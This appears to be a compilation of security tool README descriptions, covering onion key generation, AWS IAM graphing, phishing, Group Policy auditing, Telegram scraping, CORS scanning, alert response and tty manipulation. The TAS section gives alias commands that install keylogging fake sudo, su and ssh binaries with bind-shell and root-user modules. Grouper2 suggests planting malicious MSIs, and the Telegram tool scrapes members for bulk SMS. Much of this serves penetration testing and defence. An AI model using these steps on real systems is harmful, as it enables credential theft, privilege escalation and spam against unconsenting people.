
Scallion - GPU-based Onion Addresses Hash Generator


Scallion lets you create vanity GPG keys and .onion addresses (for Tor's hidden services) using OpenCL.
Scallion runs on Mono (tested in Arch Linux) and .NET 3.5+ (tested on Windows 7 and Server 2008).
Scallion is currently in beta stage and under active development. Nevertheless, we feel that it is ready for use. Improvements are expected primarily in performance, user interface, and ease of installation, not in the overall algorithm used to generate keys.

FAQ
Here are some frequently asked questions and their answers:
  • Why generate GPG keys?
    Scallion was used to find collisions for every 32-bit key ID in the Web of Trust's strong set, demonstrating how insecure 32-bit key IDs are. There is a talk at DEFCON (video) and additional info can be found at https://evil32.com/.
  • What are valid characters?
    Tor .onion addresses use Base32, consisting of all letters and the digits 2 through 7, inclusive. They are case-insensitive.
    GPG fingerprints use hexadecimal, consisting of the digits 0-9 and the letters A-F.
  • Can you use Bitcoin ASICs (e.g. Jalapeno, KnC) to accelerate this process?
    Sadly, no. While the process Scallion uses is conceptually similar (increment a nonce and check the hash), the details are different (SHA-1 vs. double SHA-256 for Bitcoin). Furthermore, Bitcoin ASICs are as fast as they are because they are extremely tailored to Bitcoin mining. For example, here's the datasheet for the CoinCraft A-1, an ASIC that never came out, but is probably indicative of the general approach. The microcontroller sends work in the form of the final 128 bits of a Bitcoin block, the hash midstate of the previous bits, a target difficulty, and the maximum nonce to try. The ASIC chooses where to insert the nonce, and it decides which results meet the target. Scallion has to insert the nonce in a different location, and it checks for a pattern match rather than just "lower than XXXX".
  • How can you use multiple devices?
    Run multiple Scallion instances. Scallion searches are probabilistic, so you won't be repeating work with the second device. True multi-device support wouldn't be too difficult, but it also wouldn't add much. I've run several scallion instances in tmux or screen with great success. You'll just need to manually abort all the jobs when one finds a pattern (or write a shell script to monitor the output file and kill them all when it sees results).
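    For instance, a small Python watcher along these lines could do the job (a rough sketch: the device numbers, the pattern, and the log-scanning heuristic are assumptions, not options documented by Scallion itself):
    import subprocess
    import time

    CMD = ["mono", "scallion/bin/Debug/scallion.exe"]   # path from the Usage section below
    PATTERN = "prefix"                                   # whatever you are searching for

    # One instance per device, each writing to its own log file.
    procs, logs = [], []
    for dev in ("0", "1"):
        log = open(f"scallion-dev{dev}.log", "w+")
        logs.append(log)
        procs.append(subprocess.Popen(CMD + ["-d", dev, PATTERN], stdout=log, stderr=subprocess.STDOUT))

    def found_key() -> bool:
        # Scallion prints an <XmlMatchOutput> block once a match is found (see Usage below).
        return any("<XmlMatchOutput>" in open(log.name).read() for log in logs)

    while not found_key():
        time.sleep(5)

    for p in procs:
        p.terminate()   # stop the remaining searches once one of them has a result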

Dependencies
  • OpenCL and relevant drivers installed and configured. Refer to your distribution's documentation.
  • OpenSSL. For Windows, the prebuilt x86 DLLs are included.
  • On Windows only, the VC++ Redistributable 2008

Binary Download
Just want the latest binary version? Grab it here.

Build Linux
Prerequisites
  • Get the latest mono for your linux distribution:
    http://www.mono-project.com/download/
  • Install Common dependencies:
    sudo apt-get update
    sudo apt-get install libssl-dev mono-devel
  • AMD/open-source build: sudo apt-get install ocl-icd-opencl-dev
  • Nvidia build: sudo apt-get install nvidia-opencl-dev nvidia-opencl-icd
  • Finally, build: msbuild scallion.sln

Docker Linux (nvidia GPUs only)
  1. Have the nvidia-docker container runtime
  2. Build the container:
    docker build -t scallion -f Dockerfile.nvidia .
  3. Run:
    docker run --runtime=nvidia -ti --rm scallion -l
    screenshot of expected output

Build Windows
  1. Open 'scallion.sln' in VS Express for Desktop 2012
  2. Build the solution. I did everything in debug mode.

Usage
Restarting Scallion during a search will not lose "progress": the search is probabilistic, so there is no "progress" to lose.
List devices
$ mono scallion/bin/Debug/scallion.exe -l
Generate a hash
$ mono scallion/bin/Debug/scallion.exe -d 0 prefix
Cooking up some delicious scallions...
Using kernel optimized from file kernel.cl (Optimized4)
Using work group size 128
Compiling kernel... done.
Testing SHA1 hash...
CPU SHA-1: d3486ae9136e7856bc42212385ea797094475802
GPU SHA-1: d3486ae9136e7856bc42212385ea797094475802
Looks good!
LoopIteration:40 HashCount:671.09MH Speed:9.5MH/s Runtime:00:01:10 Predicted:00:00:56 Found new key! Found 1 unique keys.
<XmlMatchOutput>
<GeneratedDate>2014-08-05T07:14:50.329955Z</GeneratedDate>
<Hash>prefix64kxpwmzdz.onion</Hash>
<PrivateKey>-----BEGIN RSA PRIVATE KEY-----
MIICXAIBAAKBgQCmYmTnwGOCpsPOqvs5mZQbIM1TTqOHK1r6zGvpk61ZaT7z2BCE
FPvdTdkZ4tQ3/95ufjhPx7EVDjeJ/JUbT0QAW/YflzUfFJuBli0J2eUJzhhiHpC/
1d3rb6Uhnwvv3xSnfG8m7LeI/Ao3FLtyZFgGZPwsw3BZYyJn3sD1mJIJrQIEB/ZP
ZwKBgCTUQTR4zcz65zSOfo95l3YetVhfmApYcQQd8HTxgTqEsjr00XzW799ioIWt
vaKMCtJlkWLz4N1EqflOH3WnXsEkNA5AVFe1FTirijuaH7e46fuaPJWhaSq1qERT
eQT1jY2jytnsJT0VR7e2F83FKINjLeccnkkiVknsjrOPrzkXAkEA0Ky+vQdEj64e
iP4Rxc1NreB7oKor40+w7XSA0hyLA3JQjaHcseg/bqYxPZ5J4JkCNmjavGdM1v6E
OsVVaMWQ7QJBAMweWSWtLp6rVOvTcjZg+l5+D2NH+KbhHbNLBcSDIvHNmD9RzGM1
Xvt+rR0FA0wUDelcdJt0R29v2t19k2IBA8ECQFMDRoOQ+GBSoDUs7PUWdcXtM7Nt
QW350QEJ1hBJkG2SqyNJuepH4PIktjfytgcwQi9w7iFafyxcAAEYgj4HZw8CQAUI
3xXEA2yZf9/wYax6/Gm67cpKc3sgKVczFxsHhzEml6hi5u0FG7aNs7jQTRMW0aVF
P8Ecx3l7iZ6TeakqGhcCQGdhCaEb7bybAmwQ520omqfHWSte2Wyh+sWZXNy49EBg
d1mBig/w54sOBCUHjfkO9gyiANP/uBbR6k/bnmF4dMc=
-----END RSA PRIVATE KEY-----
</PrivateKey>
<PublicModulusBytes>pmJk58BjgqbDzqr7OZmUGyDNU06jhyta+sxr6ZOtWWk+89gQhBT73U3ZGeLUN//ebn44T8exFQ43ifyVG09EAFv2H5c1HxSbgZYtCdnlCc4YYh6Qv9Xd62+lIZ8L798Up3xvJuy3iPwKNxS7cmRYBmT8LMNwWWMiZ97A9ZiSCa0=</PublicModulusBytes>
<PublicExponentBytes>B/ZPZw==</PublicExponentBytes>
</XmlMatchOutput>
init: 491ms / 1 (491ms, 2.04/s)
generate key: 1193ms / 6 (198.83ms, 5.03/s)
cpu precompute: 10ms / 6 (1.67ms, 600/s)
total without init: 70640ms / 1 (70640ms, 0.01/s)
set buffers: 0ms / 40 (0ms, 0/s)
write buffers: 3ms / 40 (0.08ms, 13333.33/s)
read results: 67442ms / 40 (1686.05ms, 0.59/s)
check results: 185ms / 40 (4.63ms, 216.22/s)

9.50 million hashes per second

Stopping the GPU and shutting down...

Multipattern Hashing
Scallion supports finding one or more of multiple patterns through a primitive regex syntax. Only character classes (ex. [abcd]) are supported. The . character represents any character. Onion addresses are always 16 characters long and GPG fingerprints are always 40 characters. You can find a suffix by putting $ at the end of the match (ex. DEAD$). Finally, the pipe syntax (ex. pattern1|pattern2) can be used to find multiple patterns. Searching for multiple patterns (within reason) will NOT produce a significant decrease in speed. Many regexes will produce a single pattern on the GPU and result in no speed reduction.
Some use cases with examples:
  • Generate a prefix followed by a number for better readability:
      mono scallion.exe prefix[234567]
  • Search for several patterns at once (n.b. -c causes scallion to continue generating even once it gets a hit)
      mono scallion.exe -c prefix scallion hashes
    mono scallion.exe -c "prefix|scallion|hashes"
  • Search for the suffix "badbeef"
      mono scallion.exe .........badbeef
    mono scallion.exe --gpg badbeef$ # Generate GPG key
  • Complicated, self-explanatory example:
      mono scallion.exe "suffixa$|suffixb$|prefixa|prefixb|a.suffix$|a.test.$"

How does Scallion work?
At a high level Scallion works as follows:
  1. Generate RSA key using OpenSSL on the CPU
  2. Send the key to the GPU
  3. Increase the key's public exponent
  4. Hash the key
  5. If the hashed key is not a partial collision go to step 3
  6. If the key does not pass the sanity checks recommended by PKCS #1 v2.1 (checked on the CPU) go to step 3
  7. Brand new key with partial collision!
The basic algorithm is described above. Speed / performance is the result of massive parallelization, both on the GPU and the CPU.
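As a rough CPU-only illustration of steps 3-5, the sketch below bumps the public exponent and re-hashes until the address matches; der_encode is a hypothetical helper that returns the DER-encoded public key for a given exponent (the modulus stays fixed), and the .onion derivation shown is the standard one for Tor v2 addresses:
import base64
import hashlib

def onion_address(der_pubkey: bytes) -> str:
    # A v2 .onion address is the base32 encoding of the first 80 bits (10 bytes)
    # of the SHA-1 hash of the DER-encoded RSA public key.
    return base64.b32encode(hashlib.sha1(der_pubkey).digest()[:10]).decode().lower()

def search(der_encode, start_exponent: int, prefix: str) -> int:
    e = start_exponent
    while not onion_address(der_encode(e)).startswith(prefix):
        e += 2                      # keep the public exponent odd
    return e                        # candidate; still needs the PKCS #1 sanity checks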

Speed / Performance
It is important to realize that Scallion performs a probabilistic search. Actual times may vary significantly from predicted.
The initial RSA key generation is done on the CPU. An Ivy Bridge i7 can generate 51 keys per second using a single core. Each key can provide 1 gigahash worth of exponents to mine, and a decent CPU can keep up with several GPUs as currently implemented.
SHA1 hashing is done on the GPU. The hashrates for several GPUs we have tested are below (grouped by manufacturer and sorted by power):
GPU                          Speed
Intel i7-2620M               9.9 MH/s
Intel i5-5200U               118 MH/s
NVIDIA GT 520                38.7 MH/s
NVIDIA Quadro K2000M         90 MH/s
NVIDIA GTS 250               128 MH/s
NVIDIA GTS 450               144 MH/s
NVIDIA GTX 670               480 MH/s
NVIDIA GTX 970               2350 MH/s
NVIDIA GTX 980               3260 MH/s
NVIDIA GTX 1050 (M)          1400 MH/s
NVIDIA GTX 1070              4140 MH/s
NVIDIA GTX 1070 TI           5100 MH/s
NVIDIA GTX TITAN X           4412 MH/s
NVIDIA GTX 1080              5760 MH/s
NVIDIA Tesla V100            11646 MH/s
AMD A8-7600 APU              120 MH/s
AMD Radeon HD5770            520 MH/s
AMD Radeon HD6850            600 MH/s
AMD Radeon RX 460            840 MH/s
AMD Radeon RX 470            957 MH/s
AMD Radeon R9 380X           2058 MH/s
AMD FirePro W9100            2566 MH/s
AMD Radeon RX 480            2700 MH/s
AMD Radeon RX 580            3180 MH/s
AMD Radeon R9 Nano           3325 MH/s
AMD Vega Frontier Edition    7119 MH/s
MH/s = million hashes per second
It's worth noting that Intel has released OpenCL drivers for its processors, so short collisions can be found on the CPU.
To calculate the number of seconds required for a given partial collision (on average), use the formula:
Type              Estimated time
GPG Key           2^(4*length-1) / hashspeed
.onion Address    2^(5*length-1) / hashspeed
For example, on my NVIDIA Quadro K2000M I see around 90 MH/s. At that speed I can generate an eight-character .onion prefix in about 1h 41m: 2^(5*8-1) / 90 million = 101 minutes.
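The same arithmetic in Python, reproducing the example above:
length = 8                # characters in the desired .onion prefix
hashspeed = 90e6          # ~90 MH/s, e.g. a Quadro K2000M
seconds = 2 ** (5 * length - 1) / hashspeed
print(int(seconds // 60), "minutes")   # ~101 minutes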

Workgroup Size
Scallion will use your device's reported preferred work group size by default. This is a reasonable default, but experimenting with the work group size may increase performance.

Security
The keys generated by Scallion are quite similar to those generated by shallot. They have unusually large public exponents, but they are put through the full set of sanity checks recommended by PKCS #1 v2.1 via openssl's RSA_check_key function. Scallion supports several RSA key sizes, with optimized kernels for 1024b, 2048b, and 4096b. Other key sizes may work, but have not been tested.

Thanks / References

Donations
Feel free to direct donations to the Bitcoin address: 1FxQcu6vhpwsqcTjPsjK43CZ9vjnuk4Hmo



Aaia - AWS Identity And Access Management Visualizer And Anomaly Finder


Aaia (pronounced as shown here) helps in visualizing AWS IAM and Organizations in a graph format with the help of Neo4j. This makes it easy to identify outliers. Since it is based on Neo4j, one can query the graph using Cypher queries to find anomalies.
Aaia also supports modules to programmatically fetch data from the Neo4j database and process it in a custom fashion. This is mostly useful when complex comparisons or logic have to be applied which would not be easy through Cypher queries alone.
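For example, a custom check could query the loaded graph with the official Neo4j Python driver; the Cypher below uses illustrative labels and relationship names, so consult Aaia's actual DB schema before writing a real module:
from neo4j import GraphDatabase   # pip install neo4j

driver = GraphDatabase.driver("bolt://localhost:7687", auth=("neo4j", "password"))

# Illustrative query: list users together with the policies attached to them.
QUERY = "MATCH (u:User)-[:HAS_POLICY]->(p:Policy) RETURN u.name AS user, p.name AS policy"

with driver.session() as session:
    for record in session.run(QUERY):
        print(record["user"], "->", record["policy"])

driver.close()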
Aaia was initially intended to be a tool to enumerate privilege escalation possibilities and find loopholes in AWS IAM. It was inspired by this quote by @JohnLaTwC:
"Defenders think in lists. Attackers think in graphs. As long as this is true, attackers win."

Why the name "Aaia" ?
Aaia in Tamil means grandma. In general, Aaia knows everything about the family. She can easily connect who is related to whom, and how, and give you the connection within a split second. She is a living graph database. :P
Since "Aaia" (this tool) does more or less the same, hence the name.

Installation

Install the neo4j Database
Instructions here
Set up the username, password and bolt connection URI in the Aaia.conf file. An example format is already given in the Aaia.conf file.

Install OS dependency

Debian :-
apt-get install awscli jq

Redhat / Fedora / Centos / Amazon Linux :-
yum install awscli jq

Note:
These packages are needed for Aaia_aws_collector.sh script. Ensure these packages are present in the base system from where the collector script is being run.

Clone this repository
git clone https://github.com/rams3sh/Aaia
cd Aaia/

Create a virtual environment
python3 -m venv env

Activate the virtual environment
source env/bin/activate
Note: Aaia depends on the pyjq library, which is not currently stable on Windows. Hence Aaia is not supported on Windows.

Install the dependencies
python -m pip install -r requirements.txt

Using Aaia

Setting up Permissions in AWS
Aaia requires the following AWS permissions for the collector script to collect relevant data from AWS:
iam:GenerateCredentialReport
iam:GetCredentialReport
iam:GetAccountAuthorizationDetails
iam:ListUsers
iam:GetUser
iam:ListGroups
iam:ListRoles
iam:GetRole
iam:GetPolicy
iam:GetAccountPasswordPolicy
iam:GetAccountSummary
iam:ListAccountAliases
organizations:ListAccountsForParent
organizations:ListOrganizationalUnitsForParent
organizations:DescribeOrganization
organizations:ListRoots
organizations:ListAccounts
organizations:ListTagsForResource
organizations:ListPolicies
organizations:ListTargetsForPolicy
organizations:DescribePolicy
organizations:ListAWSServiceAccessForOrganization
"Organizations" related permissions can be ommitted. However , all the above mentioned "IAM" related permissions are necessary.
Ensure the permissions are available to the user / role / any aws principal which will be used for collection of data for the collector script.

Collecting data from AWS
Ensure you have AWS credentials configured. Refer to this for help.
Once the credentials are set up, run:
./Aaia_aws_collector.sh <profile_name>
Ensure the output format of the AWS profile being used for data collection is set to json, as Aaia expects the collected data to be in JSON format.

Note:-
If data has to be collected from another instance, copy the "Aaia_aws_collector.sh" file to the remote instance, run it, and copy the generated "offline_data" folder to the Aaia path on the instance where Aaia is set up, then carry on with the following steps. This is helpful in consulting or client audit scenarios.

Loading the collected data to Neo4j DB
python Aaia.py -n <profile_name> -a load_data
-n supports "all" as a value, which loads all data collected and present within the offline_data folder.

Note:
Please ensure you do not have a profile named "all" in the credentials file, as it may conflict with this argument. :P
Now we are ready to use Aaia.

Audit IAM through a custom module
As of now, a sample module is given as a skeleton example. One can use it as a reference for building custom modules.
python Aaia.py -n all -m iam_sample_audit

Thanks to
Aaia is influenced and inspired by various amazing open source projects. Huge shoutout to:

Aaia in Action


Screenshots
A sample visual of a dummy AWS Account's IAM


A sample visual of a result of a cypher query to find all relations of a user in AWS IAM


TO DO
  • Write a detailed documentation for understanding Aaia's Neo4j DB Schema
  • Write a detailed documentation for developing custom modules for Aaia
  • Write custom modules to evaluate the 28 AWS privilege escalation methods identified by RhinoSecurity.
  • Provide a cheatsheet of queries for identifying simple issues in AWS IAM
  • Extend Aaia to other cloud providers.


Gophish - Open-Source Phishing Toolkit


Gophish is an open-source phishing toolkit designed for businesses and penetration testers. It provides the ability to quickly and easily setup and execute phishing engagements and security awareness training.

Install
Installation of Gophish is dead-simple - just download and extract the zip containing the release for your system, and run the binary. Gophish has binary releases for Windows, Mac, and Linux platforms.

Building From Source
If you are building from source, please note that Gophish requires Go v1.10 or above!
To build Gophish from source, simply run go get github.com/gophish/gophish and cd into the project source directory. Then, run go build. After this, you should have a binary called gophish in the current directory.

Docker
You can also use Gophish via an unofficial Docker container here.

Setup
After running the Gophish binary, open an Internet browser to https://localhost:3333 and login with the default username (admin) and password (gophish).

Documentation
Documentation can be found on our site. Find something missing? Let us know by filing an issue!


Grouper2 - Find Vulnerabilities In AD Group Policy


What is it for?
Grouper2 is a tool for pentesters to help find security-related misconfigurations in Active Directory Group Policy.
It might also be useful for other people doing other stuff, but it is explicitly NOT meant to be an audit tool. If you want to check your policy configs against some particular standard, you probably want Microsoft's Security and Compliance Toolkit, not Grouper or Grouper2.

What does it do?
It dumps all the most interesting parts of group policy and then roots around in them for exploitable stuff.

How is it different from Grouper?
Where Grouper required you to:
  • have GPMC/RSAT/whatever installed on a domain-joined computer
  • generate an xml report with the Get-GPOReport PowerShell cmdlet
  • feed the report to Grouper
  • a bunch of gibberish falls out and hopefully there's some good stuff in there.
Grouper2 does like Mr Ed suggests and goes straight to the source, i.e. SYSVOL.
This means you don't have the horrible dependency on Get-GPOReport (hooray!) but it also means that it has to do a bunch of parsing of different file formats and so on (booo!).
Other cool new features:
  • better file permission checks that don't involve writing to disk.
  • doesn't miss those GPP passwords that Grouper 1 did.
  • HTML output option so you can preserve those sexy console colours and take them with you.
  • aim Grouper2 at an offline copy of SYSVOL if you want.
  • it's multithreaded!
  • a bunch of other great stuff but it's late and I'm tired.
Also, it's written in C# instead of PowerShell.

How do I use it?
Literally just run the EXE on a domain joined machine in the context of a domain user, and magic JSON candy will fall out.
If the JSON burns your eyes, add -g to make it real pretty.
If you love the prettiness so much you wanna take it with you, do -f "$FILEPATH.html" to puke the candy into an HTML file.
If there's too much candy and you want to limit output to only the tastiest morsels, set the 'interest level' with -i $INT, the bigger the number the tastier the candy, e.g. -i 10 will only give you stuff that will probably result in creds or shells.
If you don't want to dig around in old policy and want to limit yourself to only current stuff, do -c.
If you want the candy to fall out faster, you can set the number of threads with -t $INT - the default is 10.
If you want to see the other options, do -h.

I don't get it.
OK have a look at this:


In the screenshot above we can see an "Assigned Application" policy that is still being pushed to computers, but the MSI file to install is missing, and the directory it's being installed from is writable by the current user.
If you created a hacked up MSI (e.g. with msfvenom) and then modified it to match the UIDs at the bottom of the picture, it would get executed on machines targeted by the GPO. Sweet!


In this one you can see that someone's done something absolutely insane to the ACLs on the registry.
You get the picture.

How can I help?
Look at the dev branch, Sh3r4 has been working on a big refactor to make it easier to maintain and more efficient going forward.
A rough roadmap ATM is:
  • Get dev branch functioning at least as well as master does.
    • If you want to help with this, look at issues tagged 'dev'.
  • Finish basic unit tests of assessment and interest-level code blocks.
  • Bring the big refactor over to master.
  • Start actually working on the other issues and features and whatnot.
If you want to discuss via Slack you can ping me (@l0ss) on the BloodHound Slack, joinable at https://bloodhoundgang.herokuapp.com/, or chat with a group of contributors in the #Grouper channel.

Credits and Thanks
  • Huge thanks to Sh3r4 for all her help, I have no idea how to write code and it would show way worse without her.
  • Much assistance and code cleanup from @liamosaur
  • SDDL parsing from https://github.com/zacateras/
  • Thanks to @skorov8 for providing some useful registry key data.


TeleGram-Scraper - Telegram Group Scraper Tool (Fetch All Information About Group Members)


Telegram Group Scraper Tool. Fetch All Information About Group Members

• How To Install & Setup API ( Termux )


• API Setup
  • Go to http://my.telegram.org and log in.
  • Click on API development tools and fill the required fields.
  • Put the app name you want & select "other" as the platform. Example:
  • Copy "api_id" & "api_hash" after clicking create app (they will be used in setup.py).

• How To Install and Use
$ pkg install -y git python
$ git clone https://github.com/th3unkn0n/TeleGram-Scraper.git
$ cd TeleGram-Scraper
  • Install requirements
$ python3 setup.py -i
  • Set up the configuration file (apiID, apiHASH)
$ python3 setup.py -c
  • To generate user data
$ python3 scrapr.py
  • (members.csv is the default; if you changed the name, use that instead)
  • Send bulk SMS to collected data
$ python3 smsbot.py members.csv
  • Add users to your group (in development)
$ python3 add2group.py members.csv
  • Update Tool
$ python3 setup.py -u


Corsy v1.0 - CORS Misconfiguration Scanner


Corsy is a lightweight program that scans for all known misconfigurations in CORS implementations.

Requirements
Corsy only works with Python 3 and has the following dependencies:
  • tld
  • requests
To install these dependencies, navigate to the Corsy directory and execute pip3 install -r requirements.txt

Usage
Using Corsy is pretty simple
python3 corsy.py -u https://example.com

Scan URLs from a file
python3 corsy.py -i /path/urls.txt

Number of threads
python3 corsy.py -u https://example.com -t 20

Delay between requests
python3 corsy.py -u https://example.com -d 2

Export results to JSON
python3 corsy.py -i /path/urls.txt -o /path/output.json

Custom HTTP headers
python3 corsy.py -u https://example.com --headers "User-Agent: GoogleBot\nCookie: SESSION=Hacked"

Skip printing tips
-q can be used to skip printing of description, severity, exploitation fields in the output.

Tests implemented
  • Pre-domain bypass
  • Post-domain bypass
  • Backtick bypass
  • Null origin bypass
  • Unescaped dot bypass
  • Invalid value
  • Wild card value
  • Origin reflection test
  • Third party allowance test
  • HTTP allowance test
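To give a feel for what these tests check, the origin reflection test boils down to something like the following sketch (an illustration of the idea, not Corsy's actual code):
import requests

def reflects_arbitrary_origin(url: str) -> bool:
    evil = "https://evil.example"
    r = requests.get(url, headers={"Origin": evil}, timeout=10)
    acao = r.headers.get("Access-Control-Allow-Origin", "")
    creds = r.headers.get("Access-Control-Allow-Credentials", "").lower()
    # Reflecting an attacker-controlled origin, especially with credentials
    # allowed, is the classic exploitable CORS misconfiguration.
    return acao == evil and creds == "true"

print(reflects_arbitrary_origin("https://example.com"))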

TAS - A Tiny Framework For Easily Manipulate The Tty And Create Fake Binaries


A tiny framework for easily manipulate the tty and create fake binaries.

How does it work?
The framework has three main functions, tas_execv, tas_forkpty, and tas_tty_loop.
  • tas_execv: It is a function similar to execv, but it doesn't re-execute the current binary, something very useful for creating fake binaries.
  • tas_forkpty: It is the same as forkpty, but it fills a custom structure; check the forkpty man page for more details.
  • tas_tty_loop: this is where the manipulation of the tty happens. You can set a hook function for the input and output, so it is possible to store the keys typed by the user or manipulate the terminal output (see leet-shell).
This is a superficial overview; check the code in the tas/fakebins/fun folders to understand how it really works.
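As a rough Python analogue of what tas_tty_loop does (TAS itself is written in C), the sketch below spawns a shell on a pty and hooks both directions of the traffic, logging keystrokes and passing output through unchanged:
import os
import pty

LOG = open("/tmp/.keys.txt", "ab")   # mirrors the default logfile mentioned below

def stdin_hook(fd: int) -> bytes:
    data = os.read(fd, 1024)         # whatever the user types
    LOG.write(data)
    LOG.flush()
    return data                      # forward it to the child untouched

def output_hook(fd: int) -> bytes:
    return os.read(fd, 1024)         # child output; could be rewritten here (cf. leet-shell)

pty.spawn(["/bin/sh"], master_read=output_hook, stdin_read=stdin_hook)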

Fakebins
Through manipulation of the PATH environment variable, or by using bash's aliases (or any other shell that supports aliases), you can run another program instead of the program that the user usually runs. This makes it possible to capture keystrokes and modify the command line to change the original program behavior.
Changing the command line of some programs, like sudo and su, can lead to privilege escalation.
I've created three programs as examples of what you can do with the framework: sudo, su and generic-keylogger.

generic-keylogger
The generic-keylogger, as the name suggests, is a binary that acts like a keylogger; the main idea is to use it to get passwords from programs like ssh, mysql, etc.

sudo/su
It can be used as a keylogger, or you can run some of the modules as root, by manipulating the command line.

Step-by-step cmd change:
The user types sudo cmd
fakesudo cmd runs
The fakesudo executes sudo fakesudo cmd
Once it is running as root, fakesudo creates a child process to execute some of the modules, and in the main PID it runs the original command.
Note: fakesudo only changes the command if the user runs sudo cmd [args]; if additional flags are used, the command isn't touched.
Almost the same process happens with the su:
The user types su -
fakesu - runs
The fakesu executes su - -c fakesu
Once it is running as root, fakesu creates a child process to execute some of the modules, and in the main PID it runs bash -i.
Note: fakesu only changes the command if the user runs su or su -; if additional flags are used, the command isn't touched.

Modules
For now, there are only three modules:
  • add-root-user - creates a root user with password in /etc/passwd.
  • bind-shell - listen for incoming connections and spawn a tty shell.
  • system - executes a command as root.
I may add more modules in the future, but if you are familiar with the C language, I believe it is not very difficult to change the programs to run what you want as root: just modify a few lines of code and change the super() function.

Building
First, build the base library:
$ make
CC .obj/globals.o
CC .obj/getinode.o
CC .obj/tas-execv.o
CC .obj/tty.o
CC .obj/xreadlink.o
AR .obj/libtas.a
After that, you can build generic-keylogger, sudo or su, by running make [target-bin]
Example:
$ make su
make[1]: Entering directory '/home/test/tas/fakebins/su'
[+] configuring fakesu ...
enable keylogger? [y/N] y
number of lines to record [empty = store all]:
logfile (default: /tmp/.keys.txt):
use some FUN modules? [y/N] n
[+] configuration file created in /home/test/tas/fakebins/su/config.h
CC su
make[1]: Leaving directory '/home/test/tas/fakebins/su'

Examples

Creating a fakessh:
Compile:
$ make generic-keylogger
make[1]: Entering directory '/home/test/tas/fakebins/generic-keylogger'
[+] configuring generic-keylogger ...
number of lines to record [empty = store all]: 3
logfile (default: /tmp/.keys.txt):
[+] configuration file created in /home/test/tas/fakebins/generic-keylogger/config.h
CC generic-keylogger
make[1]: Leaving directory '/home/test/tas/fakebins/generic-keylogger'
Install:
$ mkdir ~/.bin
$ cp generic-keylogger ~/.bin/ssh
$ echo "alias ssh='$HOME/.bin/ssh'" >> ~/.bashrc
In action:

Using the bind-shell module
Compile:
make[1]: Entering directory '/home/test/tas/fakebins/sudo'
[+] configuring fakesudo ...
enable keylogger? [y/N] n
use some FUN modules? [y/N] y
[1] add-root-user
[2] bind-shell
[3] system
[4] cancel
> 2
listen port (Default: 1337): 5992
[+] configuration file created in /home/test/tas/fakebins/sudo/config.h
CC sudo
make[1]: Leaving directory '/home/test/tas/fakebins/sudo'
Install:
$ cp sudo ~/.sudo
$ echo "alias sudo='$HOME/.sudo'" >> ~/.bashrc
In action:

leet-shell
leet-shell is an example of how you can manipulate the tty output; it allows you to use bash like a 1337 h4x0r.
[test@alfheim tas]$ make fun/leet-shell
CC fun/leet-shell
[t3st@alfheim tas]$ fun/leet-shell
SP4WN1NG L33T SH3LL H3R3 !!!
[t3st@4lfh31m t4s]$ 3ch0 'l33t sh3ll 1s l33t !!!'
l33t sh3ll 1s l33t !!!


AlertResponder - Automatic Security Alert Response Framework By AWS Serverless Application Model

AlertResponder is a serverless framework for automatic response to security alerts.

Overview
AlertResponder receives an alert (an event of interest from a security viewpoint) and responds to it automatically. AlertResponder has 3 parts of automatic response.
  1. Inspector investigates entities that appear in the alert, including IP addresses and domain names, and stores a result: reputation, history of malicious activities, associated cloud instance, etc. The following components are already provided to integrate with your AlertResponder environment. You can also create your own Inspector to check logs stored in your own log storage or log search system.
  2. Reviewer receives the alert with the result(s) of the Inspector and evaluates the severity of the alert. The Reviewer should be written by each security operator/administrator of your organization, because security policies differ from organization to organization (a schematic sketch of this role follows this list).
  3. Emitter finally receives the alert with the result of the Reviewer's severity evaluation. After that, Emitter sends it to an external integrated system, e.g. PagerDuty, Slack, GitHub Enterprise, etc. Automatic quarantine can also be configured via an AWS Lambda function.
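As a schematic illustration of the Reviewer role only (AlertResponder and its examples are written in Go, and the real interface is defined by the framework, so the field names here are invented), a Lambda-style handler might look like this:
def handler(event, context):
    # Input: the alert plus the Inspector reports attached to it (invented field names).
    alert = event.get("alert", {})
    reports = event.get("reports", [])

    severity = "safe"
    if any(r.get("malicious") for r in reports):
        severity = "urgent"
    elif alert.get("from_internal_host"):
        severity = "notable"

    # Output: the severity the Emitter will act on.
    return {"severity": severity}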

Concept
  • Pull based correlation analysis
  • Alert aggregation
  • Pluggable Inspectors and Emitters

Getting Started
Please replace the following variables according to your environment:
  • $REGION: Replace it with your AWS region. (e.g. ap-northeast-1)
  • $STACK_NAME: Replace it with CloudFormation stack name
$ curl -o alert_responder.yml https://s3-$REGION.amazonaws.com/cfn-assets.$REGION/AlertResponder/templates/latest.yml
$ aws cloudformation deploy --template-file alert_responder.yml --stack-name $STACK_NAME --capabilities CAPABILITY_IAM

Development

Architecture Overview


Prerequisite
  • awscli >= 1.16.20
  • Go >= 1.11
  • GNU automake >= 1.16.1

Deploy and Test

Deploy own AlertResponder stack
Prepare a parameter file, e.g. config.json, and run the make command.
$ cat config.json
{
"StackName": "your-alert-responder-name",
"TestStackName": "your-test-stack-name",
"CodeS3Bucket": "your-some-bucket",
"CodeS3Prefix": "for-example-functions",

"InspectionDelay": "1",
"ReviewDelay": "10"
}
$ env AR_CONFIG=config.json make deploy
NOTE: Please make sure that you have AWS credentials (e.g. an API key) and appropriate permissions.

Deploy a test stack
After deploying AlertResponder, move to the tester directory and deploy a stack for testing.
$ cd tester/
$ make AR_CONFIG=../config.json deploy
After deploying, you can see params.json, which is created by the script under the tester directory.
$ cat params.json
{
"AccountId": "214219211678",
"Region": "ap-northeast-1",
"Inspector": "slam-alert-responder-test-functions-Inspector-1OBGU89CT1P4B",
"Reporter": "slam-alert-responder-test-functions-Reporter-1NDHU0VDI8OPA"
}
Then go back to the top-level directory of the git repository and you can run the integration test.
$ go test -v
=== RUN TestInvokeBySns
--- PASS: TestInvokeBySns (3.39s)
(snip)
PASS
ok github.com/m-mizutani/AlertResponder 20.110s



YARASAFE - Automatic Binary Function Similarity Checks with Yara


SAFE is a tool for creating binary function embeddings, developed by Massarelli L., Di Luna G.A., Petroni F., Querzoni L. and Baldoni R. You can use SAFE to create your own function embeddings to use inside yara rules.
If you are interested take a look at our research paper: https://arxiv.org/abs/1811.05296
If you are using this for your research please cite:
@inproceedings{massarelli2018safe,
title={SAFE: Self-Attentive Function Embeddings for Binary Similarity},
author={Massarelli, Luca and Di Luna, Giuseppe Antonio and Petroni, Fabio and Querzoni, Leonardo and Baldoni, Roberto},
booktitle={Proceedings of 16th Conference on Detection of Intrusions and Malware & Vulnerability Assessment (DIMVA)},
year={2019}
}
This is not the code for reproducing the experiments in the paper. If you are interested in that, take a look at: https://github.com/gadiluna/SAFE

Introduction
